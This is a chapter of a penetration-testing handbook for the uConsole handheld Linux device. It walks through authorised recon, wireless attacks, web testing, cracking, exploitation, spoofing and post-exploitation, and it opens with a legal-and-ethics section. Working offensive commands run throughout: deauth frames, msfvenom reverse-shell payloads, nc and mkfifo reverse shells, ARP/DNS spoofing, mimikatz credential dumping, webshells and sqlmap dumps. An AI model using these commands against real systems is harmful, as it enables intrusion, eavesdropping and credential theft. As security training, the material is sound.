The recon-to-report workflow on a handheld Linux box, with the uConsole's specific tools, limits, and field tactics

Section	Topic
1	About this Volume
2	Legal and Ethics — Read This First
3	The Pen-test Workflow Framework
· 3.1	The six phases
· 3.2	What the uConsole does well
· 3.3	What the uConsole does badly
· 3.4	The “harvest then offload” pattern
4	Wireless Audit
· 4.1	Monitor mode — what works on which radio
· 4.2	`airmon-ng` setup
· 4.3	`airodump-ng` capture workflow
· 4.4	`aireplay-ng` deauthentication
· 4.5	`aircrack-ng` WPA handshake recovery
· 4.6	`wifite` — the all-in-one wrapper
· 4.7	`kismet` for passive long-running surveys
· 4.8	Bluetooth audit
5	Network Reconnaissance
· 5.1	`nmap` — the workhorse
· 5.2	`masscan` for fast wide scans
· 5.3	Service-version and OS fingerprinting
· 5.4	`theHarvester` for passive OSINT
· 5.5	`recon-ng` framework
· 5.6	DNS and subdomain enumeration
6	Web Application Testing
· 6.1	Burp Suite Community Edition
· 6.2	OWASP ZAP
· 6.3	`gobuster`, `wfuzz`, `feroxbuster`
· 6.4	`sqlmap`
· 6.5	`nikto`, `whatweb`, `wafw00f`
· 6.6	Latency tradeoffs on a handheld
7	Password Cracking
· 7.1	Why this is the uConsole’s worst category
· 7.2	`john the ripper`
· 7.3	`hashcat`
· 7.4	The harvest-and-offload pattern
· 7.5	Wordlist management
8	Exploitation
· 8.1	Metasploit Framework
· 8.2	`searchsploit` and Exploit-DB
· 8.3	Manual exploitation with custom payloads
· 8.4	`pwncat-cs` for upgraded reverse shells
9	Sniffing and Spoofing
· 9.1	`wireshark` and `tcpdump`
· 9.2	`ettercap` and `bettercap`
· 9.3	ARP and DNS spoofing
· 9.4	The “rogue AP” pattern (Karma / Pineapple)
10	Post-Exploitation and Pivoting
· 10.1	Linux post-exploit (`linpeas`, `linenum`)
· 10.2	Windows post-exploit (`winpeas`, `mimikatz`, `empire`)
· 10.3	`weevely` for PHP webshells
· 10.4	SSH pivoting and `ProxyChains`
· 10.5	`socat` and dynamic port forwarding
11	Forensics
· 11.1	`autopsy` and `sleuthkit`
· 11.2	`volatility` for memory dumps
· 11.3	`foremost`, `binwalk`
· 11.4	Mobile forensics (Android via ADB)
12	Field-Operations Patterns
· 12.1	The mPCIe-LTE-only loadout
· 12.2	WiFi-as-uplink + USB-Alfa-as-monitor
· 12.3	Battery management for long ops
· 12.4	Storage strategy — capture rotation
13	qFlipper and Flipper Zero Integration
· 13.1	Why this combo
· 13.2	Installing qFlipper on the uConsole
· 13.3	Flipper HTTP
· 13.4	Mouse-jiggler and other utility apps
14	The Field-Pen-test Loadout Checklist
15	Vol 12 Cheatsheet Updates
16	Resources
17	Footnotes
18	Index

1. About this Volume

This is the workflow volume. Volume 5 §4 covered how to install Kali tools on the uConsole. This volume covers what to do with them. The pen-test discipline has its own vocabulary, its own canonical workflows, and its own ethics; the uConsole is just the substrate. Most of what’s in this volume would apply equally on any Linux laptop. The uConsole-specific parts are the constraints — what the handheld does well, what it does badly, and how to structure operations around those constraints.

The reader of this volume is assumed to:

Have Kali tools installed (Vol 5 §4 Path A or Path B).
Be familiar with Linux basics — shell, processes, networking, package management.
Know the legal landscape they operate in (see §2 below; this volume does not absolve you).
Be comfortable with the idea that a successful pen-test is mostly methodical recon and reporting, not “popping shells.”

Sometimes pen-test books make the work sound exciting. The reality is closer to careful note-taking and patient enumeration. The uConsole is well-suited to this — small, quiet, long battery life, doesn’t draw attention. It’s not the right tool for a 200-host scan with full vulnerability fingerprinting (the CPU and RAM constrain that), but it’s a great tool for a focused engagement against a handful of in-scope targets.

2. Legal and Ethics — Read This First

The Hack Tools hub has a _shared/legal_ethics.md document covering the lab-discipline rules that apply to every tool here. Read it. The short version:

Run pen-test tools only on networks you own or have explicit written authorisation to test. “Implicit authorisation,” “I work in IT here,” and “the network is open” are not legal defences in any jurisdiction this author is aware of.
Authorisation must be in writing, scoped, and signed by someone with the authority to grant it. A signed Statement of Work or Rules of Engagement document. Email exchanges work for informal engagements; for paid engagements get a contract.
Stay in scope. If the SoW says “external IP range A.B.C.0/24 only,” you do not scan A.B.D.0/24, even if you find a host in D referenced in C. Document the finding and ask the client whether scope changes.
Do not exfiltrate data unless explicitly authorised. Capturing a hash for offline cracking ≠ taking customer PII off-network. The first is part of the engagement; the second is a crime.
Do not leave the target worse than you found it. No persistent backdoors, no rootkits in production, no permanent ARP poisoning. Clean up after yourself.
Report responsibly. If you find an issue outside scope (e.g., a third-party vendor’s vulnerability surfaces during your engagement), follow responsible disclosure norms — not “drop a 0-day on Twitter.”

Regional details matter. The U.S. CFAA, the U.K. Computer Misuse Act, and the E.U. Cybercrime Directive all criminalise unauthorised access to computer systems with varying definitions and penalties. The Wassenaar Arrangement adds export-control rules to certain offensive-security tools. Where you operate determines what’s permissible.

The uConsole is exactly as legal or illegal as a laptop running Kali. Hardware doesn’t change the law.

3. The Pen-test Workflow Framework

A standardised workflow keeps engagements organised, repeatable, and report-able. The canonical structure:

   ┌─────────┐    ┌──────────┐    ┌─────────┐    ┌────────────┐    ┌──────┐    ┌────────┐
   │  Recon  │ → │ Enumerate │ → │ Exploit │ → │ Post-exploit│ → │ Loot │ → │ Report │
   └─────────┘    └──────────┘    └─────────┘    └────────────┘    └──────┘    └────────┘
   passive +      active service   payload         lateral move,    capture     write up
   active info    fingerprinting   delivery        priv esc,        evidence    findings
   gathering                       + initial       persistence
                                   access          (if scoped)

3.1 The six phases

1. Recon is information gathering — what’s the target’s IP range, what hostnames resolve, what’s their public footprint. Passive (no packets sent to target: WHOIS, DNS, public records, certificate transparency) and active (ICMP, port-scan, banner grab).

2. Enumerate — for each in-scope host, what services run, which versions, what users/shares/credentials are reachable. Service fingerprinting, web spidering, SMB share enumeration, SNMP walks.

3. Exploit — given a vulnerability discovered during enumeration, deliver the exploit payload to gain initial code execution. May use Metasploit, custom scripts, web-app injection, credential reuse, etc.

4. Post-exploit — once you have a foothold, expand it. Local privilege escalation, lateral movement to adjacent hosts, persistent access (if engagement permits), data discovery.

5. Loot — capture evidence proving compromise. Hashes, screenshots, sample files, system info. Don’t take more than your scope permits.

6. Report — write up findings, severity, reproduction steps, remediation recommendations. The deliverable the client pays for. The report is the product; everything else is process.

3.2 What the uConsole does well

Recon and enumeration — most tools here are I/O-bound, not CPU-bound. The uConsole’s CM4 happily runs nmap, masscan, recon-ng against typical engagement scope.
Wireless audit on 2.4 GHz — the on-CM4 CYW43455 supports 2.4 GHz monitor mode (Vol 6 §3.4); airodump-ng works directly.
Web app testing — Burp Suite Community runs cleanly. Latency is OK for interactive work.
Long stakeouts — battery life is enough for an evening’s surveillance with kismet or a long-running airodump-ng capture.
Field discretion — small, quiet, looks like a gameboy not a laptop. People don’t ask what you’re doing.
Console / serial work — pair with the GPIO-side UART to talk to embedded targets, switches, IoT devices.
qFlipper companion — the uConsole as a hub for a Flipper Zero (§13).

3.3 What the uConsole does badly

Heavy hashcracking — no GPU acceleration. Expect 1/100th the throughput of a modern desktop with a recent NVIDIA card. See §7.1.
5 GHz wireless audit — the CYW43455 chip can’t monitor-mode 5 GHz; you need a USB adapter (Alfa AWUS036ACH or similar). Vol 6 §3.4.
Memory-hungry tools — Burp Pro with extensions, OpenVAS, large Bloodhound graphs — can OOM on a 2 GB CM4. 4 GB+ is recommended for serious web work.
High-bandwidth captures — full-spectrum SDR captures at 20 Msps saturate the V3.14 USB-2 path. Cross-ref Vol 7 §2.3.
Sustained CPU load — kernel compiles, nmap -A against /16, full-DB Bloodhound queries — these throttle after 60-90 seconds (Vol 11). Plan workloads around the thermal envelope.

3.4 The “harvest then offload” pattern

The right pattern for the uConsole’s CPU-hungry workloads:

Use the uConsole to harvest — capture the hash, the PCAP, the screenshot, the credential.
Save to fast local storage — eMMC or USB-C SSD, not microSD (slow random writes ruin long captures).
Sync to a cracking station — ssh + rsync to a desktop with NVIDIA GPUs.
Run the heavy compute remotely — hashcat on the desktop, results sync back.
Continue the engagement on the uConsole — using cracked credentials.

The uConsole is the field unit; the cracking station is the rear-echelon support. This pattern recurs throughout the volume.

4. Wireless Audit

The most common opening move for a wireless pen-test. The uConsole’s wireless capabilities and constraints:

4.1 Monitor mode — what works on which radio

Radio	2.4 GHz monitor mode	5 GHz monitor mode	Packet injection (2.4 GHz)	Notes
On-CM4 CYW43455 (built-in)	✅ (with patches)	❌	✅ (limited)	Default radio; covered by Clockwork patches
On-CM5 CYW43455 (built-in)	✅	❌	✅ (limited)	Same chip as CM4
Radxa CM5 RTL8852BE (built-in)	⚠️ (kernel-dependent)	⚠️ (kernel-dependent)	⚠️	Driver maturity varies
Alfa AWUS036ACH (USB Atheros)	✅	✅	✅	The classic USB monitor-mode adapter
Panda PAU09 (USB Ralink RT3572)	✅	✅	✅	Cheaper; smaller form factor
TP-Link TL-WN722N v1 (USB Atheros)	✅	❌	✅	2.4 GHz only; very common
HackerGadgets AC1200 (Mini PCIe)	✅	✅	✅	Replaces on-CM4 WiFi entirely

For most field work, an Alfa AWUS036ACH is the go-to USB adapter. Pair it with the uConsole’s USB-A port; airmon-ng start wlan1 (where wlan1 is the Alfa) puts it in monitor mode without disturbing the on-CM4 wlan0 (which you can leave as your normal connectivity uplink).

4.2 `airmon-ng` setup

# Step 1: kill processes that interfere with monitor mode
sudo airmon-ng check kill
# This kills NetworkManager and wpa_supplicant. Note: this also kills your
# WiFi-based SSH session if you're connected. Be on Ethernet or LTE for monitor work.

# Step 2: enable monitor mode on the chosen interface
sudo airmon-ng start wlan0
# Output:
#   PHY    Interface    Driver    Chipset
#   phy0   wlan0        brcmfmac  Cypress CYW43455
#       (mac80211 monitor mode vif enabled for wlan0 on wlan0mon)
#       (mac80211 station mode vif disabled for wlan0)

# Step 3: verify
iw dev wlan0mon info
# type should be "monitor"

# Step 4: when finished, restore
sudo airmon-ng stop wlan0mon
sudo systemctl start NetworkManager

For a second adapter (USB Alfa as monitor + on-CM4 as uplink), bring monitor mode up on the Alfa instead of the built-in:

sudo airmon-ng start wlan1
# wlan1mon now exists for monitor work; wlan0 stays connected to the AP for uplink

4.3 `airodump-ng` capture workflow

airodump-ng is the standard 802.11 capture tool — it scans channels, lists APs, and dumps frames to PCAP. Workflow:

# Survey scan (no specific target):
sudo airodump-ng wlan0mon

# Captures rotate every channel; gives you a list of in-range APs with BSSID, ESSID,
# encryption, signal strength, and station counts.

# Once you've identified a target AP, lock to that channel and BSSID:
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# This:
# - Locks to channel 6
# - Filters to that BSSID only
# - Writes packet captures to capture-*.cap (cycles through capture-01.cap, capture-02.cap...)

# Wait for a "WPA handshake: AA:BB:CC:DD:EE:FF" line in the airodump output.
# This is the 4-way handshake — gold for offline cracking.

# To accelerate: deauth a connected client to force re-association (and fresh handshake):
# (in a second terminal, see §4.4)

The capture rotates output files automatically. Storage on a microSD is the bottleneck; for long captures, run from eMMC or USB-C SSD.

4.4 `aireplay-ng` deauthentication

Force a client to re-handshake by sending deauth frames:

sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

# - --deauth 5: send 5 deauth frames
# - -a: AP BSSID
# - -c: client MAC to deauth (find in airodump's STATION column)
# - wlan0mon: monitor interface

Most clients re-associate within seconds, generating a fresh 4-way handshake that airodump captures. Important: deauth frames are detectable; modern WPA3 networks resist this attack; some IDS systems alert on bursts of deauth frames.

Legitimacy note: deauth attacks on networks you don’t own are illegal in most jurisdictions. Only on networks where you have authorisation.

4.5 `aircrack-ng` WPA handshake recovery

Once you have a handshake, crack offline:

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# Or, with a wordlist tailored to the target (cewl-generated, mangled):
sudo aircrack-ng -w custom-wordlist.txt -e "TargetSSID" capture-01.cap

On a CM4, aircrack-ng runs at ~5,000 attempts/sec for WPA. A 14M-entry rockyou list takes ~45 minutes. A custom list of likely-candidate passwords (cewl + mangler) often completes in seconds. For long lists, see §7.4 — offload to a desktop.

4.6 `wifite` — the all-in-one wrapper

wifite automates the end-to-end audit — scan, deauth, capture handshake, attempt crack:

sudo wifite --kill --wpa --dict /usr/share/wordlists/rockyou.txt
# --kill: airmon-ng check kill before starting
# --wpa: WPA targets only (skips WEP, WPS)
# --dict: wordlist for offline cracking

wifite shows a TUI with discovered APs; you select targets; it handles the rest. Good for “scan a venue, see what’s worth attacking” reconnaissance.

4.7 `kismet` for passive long-running surveys

kismet is the long-running passive sniffer. Set it up, leave it running, return hours later for a full survey of every 802.11 device that came in range:

sudo kismet -c wlan0mon
# Web UI at http://localhost:2501
# (open in a browser on the uConsole, or SSH-tunnel from another machine)

kismet writes captures to ~/.kismet/. It auto-rotates to avoid filling disk. For overnight surveys, point it at a USB-SSD: sudo kismet -c wlan0mon --override default-config:logging::log_prefix=/mnt/usb/kismet/.

4.8 Bluetooth audit

The CM4’s CYW43455 has Bluetooth 5.0 capability. Linux tools:

# Scan for nearby BT devices:
hcitool scan

# More aggressive (BLE):
sudo bluetoothctl
> scan on

# Service discovery on a found device:
sdptool browse <bd_addr>

# RFCOMM connection (if open):
sudo rfcomm connect /dev/rfcomm0 <bd_addr> 1

For BLE / WiFi simultaneously, the on-CM4 chip multiplexes — performance suffers when both are active. For dedicated BT audit, use a USB BT dongle (CSR8510, Sena BT-100C).

5. Network Reconnaissance

The “what’s on the network” phase. Tools:

5.1 `nmap` — the workhorse

Standard recipes:

# Quick discovery (which hosts are alive in a /24):
sudo nmap -sn 192.168.1.0/24

# Full TCP scan of a single host:
sudo nmap -sV -sC -p- -T4 192.168.1.10

# - -sV: probe service version
# - -sC: run default safe scripts
# - -p-: all 65535 ports
# - -T4: aggressive timing (slower than T5, doesn't trigger as many IDS alerts)

# UDP scan (slow, but DNS / NTP / SNMP / mDNS live here):
sudo nmap -sU --top-ports 100 192.168.1.10

# Aggressive scan (combination of above + OS detection):
sudo nmap -A 192.168.1.10

uConsole CM4 baseline: -sV -A against a /24 takes ~6 minutes (Vol 3 §9.5). On CM5, ~3 minutes. For larger ranges, pipe through masscan first to find live hosts (§5.2), then nmap only those.

5.2 `masscan` for fast wide scans

masscan is the “scan the internet in 6 minutes” tool. Useful when scope is large:

sudo masscan 192.168.0.0/16 -p1-65535 --rate=10000 -oL targets.list
# Scans 65k hosts × 65k ports at 10k packets/sec
# Output is a simple list of host:port pairs for hosts with open ports

uConsole’s NIC throughput caps at ~100 Mbps (CM4 WiFi); the 10k pps rate is sustainable. For higher rates (50k+), USB-Ethernet adapter required.

masscan’s output feeds into nmap for service-version on the live hosts only:

awk '/open/ {print $4}' targets.list | sort -u > hosts.txt
sudo nmap -sV -iL hosts.txt

5.3 Service-version and OS fingerprinting

nmap -O does TCP/IP-stack fingerprinting. Limited accuracy from a handheld behind a NAT, but works on direct-connect targets:

sudo nmap -O 192.168.1.10
# Output reports OS guess with confidence

For service banners specifically, whatweb (web), enum4linux-ng (SMB), snmpwalk (SNMP) give richer data than nmap -sV alone:

whatweb http://target.example.com
enum4linux-ng -A 192.168.1.10
snmpwalk -v 2c -c public 192.168.1.10

5.4 `theHarvester` for passive OSINT

Passive enumeration of public information:

theHarvester -d example.com -b duckduckgo,bing,certspotter,crtsh -l 500
# Searches public sources for emails, hostnames, employees relating to example.com

Useful early-engagement; produces a list of hostnames to feed into recon-ng or DNS enumeration.

5.5 `recon-ng` framework

recon-ng is a Metasploit-style framework for OSINT:

recon-ng
[recon-ng][default] > marketplace install all
[recon-ng][default] > workspaces create example-engagement
[recon-ng][example-engagement] > db insert domains
domain (TEXT): example.com

[recon-ng][example-engagement] > modules load recon/domains-hosts/hackertarget
[recon-ng][example-engagement][hackertarget] > run
# (enumerates subdomains of example.com via hackertarget's API)

The marketplace has ~150 modules covering DNS, certificate transparency, social media scraping, OSINT data sources. Each module contributes findings to the workspace’s database, which you can export as CSV/JSON for the report.

5.6 DNS and subdomain enumeration

# Brute-force subdomain enumeration:
sudo gobuster dns -d example.com -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt

# Certificate-transparency-based discovery:
crt.sh "%.example.com" | jq -r '.[].name_value' | sort -u

# DNS zone transfer (rarely works, worth trying):
dig axfr example.com @ns1.example.com

6. Web Application Testing

Web apps are the most-common engagement target. The uConsole’s web-app tooling:

6.1 Burp Suite Community Edition

Burp is the canonical web-app proxy. Community Edition (free) covers most engagements; Pro adds active-scan automation.

# Install (already in Pi OS apt or available via the Kali repo):
sudo apt install -y burpsuite

# Run:
burpsuite &
# (Java application; takes 5-10 seconds to start on CM4. Memory: ~500 MB.)

Workflow:

Configure browser to proxy through Burp (default 127.0.0.1:8080).
Install Burp’s CA cert in the browser to inspect HTTPS traffic.
Browse the target — Burp captures every request.
Use the Repeater to modify and resend.
Use the Intruder (rate-limited in Community) for targeted fuzzing.

Memory budget: Burp Community uses ~500 MB. With a 2 GB CM4, this leaves ~1 GB for everything else — workable but tight. 4 GB CM4 / 8 GB CM5 is comfortable.

6.2 OWASP ZAP

OWASP ZAP is Burp’s open-source equivalent. Roughly equivalent capability to Burp Community for most workflows.

sudo apt install -y zaproxy
zaproxy &

ZAP’s automated scanner is more capable than Burp Community’s. For unattended scanning workflows, ZAP wins. For interactive exploration, Burp’s UI is preferred by most testers.

6.3 `gobuster`, `wfuzz`, `feroxbuster`

Directory and parameter brute-forcing:

# Directory brute force:
gobuster dir -u http://target/ -w /usr/share/wordlists/dirb/common.txt

# More thorough (with extension list):
gobuster dir -u http://target/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,asp,aspx,html

# Parameter fuzzing:
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt --hh 1234 'http://target/api?FUZZ=test'

# (--hh 1234 hides responses with byte-count 1234 — your 404 baseline)

# feroxbuster — recursive faster gobuster:
feroxbuster -u http://target/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -d 3

uConsole CM4 throughput: ~200 req/sec sustained on a normal LAN. CM5: ~400 req/sec. The constraint is the target’s response time, not the uConsole’s CPU.

6.4 `sqlmap`

Automated SQL injection:

# Basic check on a parameter:
sqlmap -u "http://target/page.php?id=1" --dbs

# With cookie auth (common):
sqlmap -u "http://target/page.php?id=1" --cookie="PHPSESSID=abc123" --dbs

# Through Burp (intercept + send to sqlmap):
# 1. In Burp, right-click request → Save item → request.txt
# 2. sqlmap -r request.txt --dbs

# Once you confirm injection, dump:
sqlmap -u "..." -D dbname -T tablename --dump

sqlmap runs many requests; against a slow target the run can take an hour. uConsole-side resource use is minimal — it’s I/O-bound on the target.

6.5 `nikto`, `whatweb`, `wafw00f`

Quick web-app fingerprinting:

# Comprehensive (slow):
nikto -h http://target/

# Fingerprint only (fast):
whatweb http://target/

# WAF detection:
wafw00f http://target/

Use these first — they tell you what you’re against before you spend time on deeper attacks.

6.6 Latency tradeoffs on a handheld

The uConsole’s 5″ screen is workable but not generous for Burp Suite. Practical accommodations:

Use the keyboard’s Fn-chord shortcuts liberally; click-heavy workflows are painful on the trackball.
Maximise the Burp window — there’s not enough screen for tabs or split-pane.
Pipe deep work through SSH — connect from a desk-bound monitor when at the workstation; field-only when truly mobile.
Save state often — Burp Community doesn’t auto-save; close it the wrong way and you lose the request history.

7. Password Cracking

Honest section. The uConsole is not a hash-cracking platform.

7.1 Why this is the uConsole’s worst category

Modern password cracking is GPU-accelerated. Hashcat on a desktop with an RTX 4090 does ~150 billion MD5 hashes/second. The uConsole’s BCM2711 has a VideoCore VI GPU that’s not OpenCL-supported in a way that hashcat can use. So hashcat falls back to CPU, where the CM4’s four Cortex-A72s do ~10 million MD5 hashes/second — 15,000× slower.

For WPA, the gap is similar — a desktop GPU does ~5 million attempts/second; uConsole CPU does ~5,000. For NTLM, ~3,000× slower.

This is structural, not a bug. The Pi family wasn’t designed for cryptanalysis.

7.2 `john the ripper`

Useful for fast hashes (NTLM, common PHP) on small wordlists or rule-based attacks:

# Identify hash type (john's auto-detect):
john --list=formats | grep -i ntlm
echo "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0" > hashes.txt

# Crack with rockyou + best64 rules:
john --wordlist=/usr/share/wordlists/rockyou.txt --rules=best64 --format=NT hashes.txt

For small wordlists (< 1M entries) and fast hash formats, the uConsole completes in minutes. For rockyou (14M) on slow hashes, hours.

7.3 `hashcat`

Hashcat’s GPU strength is unavailable; CPU-mode hashcat is ~2× faster than john for the same hash:

# CPU mode:
hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt

# - -m 1000: NTLM
# - -a 0: dictionary attack

Hashcat’s -m codes catalogue hundreds of hash types; hashcat --help shows them. Useful for hash identification.

7.4 The harvest-and-offload pattern

The right pattern:

# On the uConsole — harvest:
# Capture WPA handshake (§4)
# Or extract NTDS.dit hashes from a domain controller compromise
# Or grab /etc/shadow from a Linux post-exploit
# Save to ~/projects/pentest/captures/

# Sync to cracking station:
rsync -av ~/projects/pentest/captures/ workstation:~/cracking-incoming/

# On the workstation (with NVIDIA GPUs):
ssh workstation
hashcat -m 22000 ~/cracking-incoming/handshake.hc22000 /opt/wordlists/rockyou.txt -r /opt/rules/best64.rule

# Sync results back:
rsync -av workstation:~/cracking-results/ ~/projects/pentest/cracked/

Workflow: uConsole captures, workstation cracks, uConsole consumes results. The uConsole stays the field unit; the workstation is rear-echelon.

7.5 Wordlist management

Wordlists eat disk:

Wordlist	Size	Use case
`/usr/share/wordlists/rockyou.txt`	134 MB	The classic; good first-attempt
`/usr/share/seclists/Passwords/...`	200+ MB	SecLists collection
HaveIBeenPwned password lists	5+ GB	Comprehensive; only on cracking station
`cewl` site-spider-generated	KB-MB	Custom; tailored to the target
`john --rules=Jumbo` derived	runs as a transformation; no extra disk

For uConsole local cracking, stick with rockyou + best64 rules + cewl-derived custom lists. Bulk wordlists belong on the workstation.

8. Exploitation

8.1 Metasploit Framework

Metasploit is the canonical exploitation framework. ~3000 modules covering exploits, payloads, post-exploit, encoders.

# First run setup:
sudo msfdb init

# Launch:
msfconsole -q

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.5
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit

# (in another terminal, deliver the payload to the target — by web upload, SSH, etc.)

# When the meterpreter callback arrives:
meterpreter > sysinfo
meterpreter > getuid
meterpreter > shell

Memory: msfconsole at idle uses ~400 MB on the uConsole. With a few sessions and modules loaded, ~700 MB. Workable on 4 GB CM4; tight on 2 GB.

msfvenom for standalone payload generation:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe -o payload.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f elf -o shell.elf
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f raw > shell.php

8.2 `searchsploit` and Exploit-DB

searchsploit is a local CLI for Exploit-DB:

sudo apt install -y exploitdb
sudo searchsploit-update

searchsploit "Apache 2.4.49"
# Returns CVEs and exploit scripts; mirror them locally:
searchsploit -m 50383   # downloads exploit by EDB-ID into current directory

Exploits are typically Python or shell scripts; review before running on a target.

8.3 Manual exploitation with custom payloads

For one-off vulnerabilities not in Metasploit, write your own:

#!/usr/bin/env python3
import requests

# Example: a CVE-2021-something IIS path-traversal:
target = "http://target/"
path = "../../../../windows/win.ini"
url = f"{target}cgi-bin/script?file={path}"
r = requests.get(url)
print(r.text)

Most engagements include 1-2 of these per. Keep a ~/projects/pentest/exploits/ directory with annotated scripts.

8.4 `pwncat-cs` for upgraded reverse shells

pwncat-cs (the “cs” fork is the maintained version) replaces a basic netcat reverse shell with a feature-rich session manager — auto-tab-completion, history, job control, file upload/download:

pip install pwncat-cs
pwncat-cs -lp 4444

# In your reverse shell on the target:
nc -e /bin/bash 192.168.1.5 4444
# Or without -e:
mkfifo /tmp/p; nc 192.168.1.5 4444 0</tmp/p | /bin/bash > /tmp/p

# Back on the uConsole, pwncat-cs gives you a clean session.

9. Sniffing and Spoofing

9.1 `wireshark` and `tcpdump`

# tcpdump for capture (lightweight):
sudo tcpdump -i wlan0 -w capture.pcap port 80

# Wireshark for analysis:
wireshark capture.pcap

# Filter expression for HTTP only:
http.request.method == "POST"

# Filter for credentials in clear text:
http.cookie or http.authorization

Wireshark on the uConsole is workable but the 5″ screen is tight for the three-pane view. SSH-tunnel to a workstation for deep packet analysis.

9.2 `ettercap` and `bettercap`

ettercap is the older ARP-spoofing toolkit; bettercap is the modern replacement.

# bettercap interactive:
sudo bettercap -iface wlan0

> set arp.spoof.targets 192.168.1.10
> arp.spoof on
> net.sniff on
> http.proxy on    # MitM HTTPS via downgrade or sslstrip-style

bettercap has a web UI at http://localhost:80 after > api.rest on. Useful for managing long-running operations.

9.3 ARP and DNS spoofing

# ARP spoof a target into thinking we're the gateway:
sudo arpspoof -i wlan0 -t 192.168.1.10 -r 192.168.1.1

# In another window, also tell the gateway we're the target:
sudo arpspoof -i wlan0 -t 192.168.1.1 -r 192.168.1.10

# Now traffic between target and gateway flows through us.

# Combined with DNS spoof (return our IP for any A record):
sudo dnsspoof -i wlan0 -f spoof.hosts
# spoof.hosts: 192.168.1.5  *.example.com

Heavyweight; legal only on owned networks.

9.4 The “rogue AP” pattern (Karma / Pineapple)

A rogue AP responds to client probe requests for “remembered networks,” letting the client connect thinking it’s joining its home WiFi.

The original “Pineapple” (Hak5) is a dedicated hardware device. Same effect on the uConsole using wifiphisher or a custom hostapd + dnsmasq setup:

sudo apt install -y wifiphisher
sudo wifiphisher --interface wlan0
# Karma-mode rogue AP; intercepts client probes

10. Post-Exploitation and Pivoting

10.1 Linux post-exploit (`linpeas`, `linenum`)

After getting a shell on a Linux target:

# On the target (after foothold):
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh > linpeas-output.txt
# Review output for SUID binaries, kernel exploits, sensitive files, sudo abuse.

linpeas is the standard Linux enumeration script. linenum is the older alternative.

10.2 Windows post-exploit (`winpeas`, `mimikatz`, `empire`)

On Windows targets:

# winPEAS:
PS> Invoke-WebRequest "https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany.exe" -OutFile winpeas.exe
PS> .\winpeas.exe

mimikatz extracts credentials from LSASS:

PS> .\mimikatz.exe
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

empire (PowerShell post-exploit framework) is a heavier framework; stage from a workstation if memory is tight on the uConsole.

10.3 `weevely` for PHP webshells

# Generate a PHP webshell:
weevely generate StrongPassword shell.php

# Upload shell.php to a vulnerable web target (file-upload bug, etc.).

# Connect:
weevely http://target/shell.php StrongPassword

weevely > :system_info
weevely > :file_ls /var/www
weevely > :sql_console

weevely is small, encrypted, and stealthy. Standard for PHP-target post-exploit.

10.4 SSH pivoting and `ProxyChains`

When you have foothold on host A and want to scan host B (which is reachable from A but not from you):

# On the uConsole:
ssh -D 1080 user@host_a       # SOCKS proxy on port 1080

# Configure ProxyChains to use it:
# /etc/proxychains.conf — add: socks5 127.0.0.1 1080

# Now any tool can pivot via host_a:
proxychains nmap -sV host_b
proxychains curl http://host_b/

ssh -L (local port forward) and ssh -R (remote port forward) handle other pivot patterns.

10.5 `socat` and dynamic port forwarding

For non-SSH pivoting:

# socat: forward local 8080 to host_b:80 via host_a (where host_a is your foothold):
# On the uConsole:
ssh -L 8080:host_b:80 user@host_a

# Or with socat (if SSH not available on host_a):
socat TCP-LISTEN:8080,fork TCP:host_b:80

11. Forensics

For analysing seized images, memory dumps, suspicious files. Less common on a handheld; useful for incident-response in field.

11.1 `autopsy` and `sleuthkit`

sudo apt install -y autopsy sleuthkit

# Open a disk image for analysis:
autopsy &
# Web UI at http://localhost:9999/autopsy

autopsy is the GUI; sleuthkit is the CLI library underneath. Useful for filesystem timeline analysis, deleted-file recovery, hash matching.

11.2 `volatility` for memory dumps

sudo apt install -y volatility3

vol -f memory.dmp windows.info
vol -f memory.dmp windows.pslist
vol -f memory.dmp windows.cmdline

Memory analysis. The uConsole has enough RAM for analysing small dumps (< 1 GB); for desktop-sized memory dumps, offload to workstation.

11.3 `foremost`, `binwalk`

File-carving and embedded-data extraction:

# Carve files from a disk image based on file signatures:
foremost -i image.dd -o output_dir/

# Inspect firmware / file containers:
binwalk firmware.bin
binwalk -e firmware.bin    # extract embedded files

binwalk is also useful for hardware-hacking workflows — cross-ref Vol 9 if you’re doing RF capture analysis with embedded keys.

11.4 Mobile forensics (Android via ADB)

# Connect Android device to USB-A; enable USB debugging:
adb devices

# Pull data:
adb pull /data/data/com.example.app /tmp/app-extract/

# Shell access:
adb shell

# Memory dump (rooted devices):
adb shell su -c "dd if=/dev/block/sda of=/sdcard/dump.dd"
adb pull /sdcard/dump.dd

iOS forensics requires libimobiledevice; out-of-scope for this volume.

12. Field-Operations Patterns

The uConsole’s distinguishing feature for pen-test work is field-deployability. Patterns that exploit this:

12.1 The mPCIe-LTE-only loadout

When you’re at the target site and need uplink that doesn’t go through the target’s network:

Install Clockwork LTE modem (Vol 7 §4.6) with an active SIM.
Configure ModemManager: mmcli -m 0 --simple-connect="apn=hologram" (or your provider’s APN).
All your traffic now goes via cellular, not the target’s WiFi/Ethernet.
Useful for: report uploads to your team, exfil-validation testing (does the target detect cellular bypass?), out-of-band command channels.

12.2 WiFi-as-uplink + USB-Alfa-as-monitor

The two-radio pattern:

On-CM4 wlan0: connected as a normal client to a friendly AP for uplink (your hotel’s WiFi, your phone’s hotspot).
USB Alfa wlan1mon: in monitor mode for capture.
They don’t conflict because they’re on different chips.

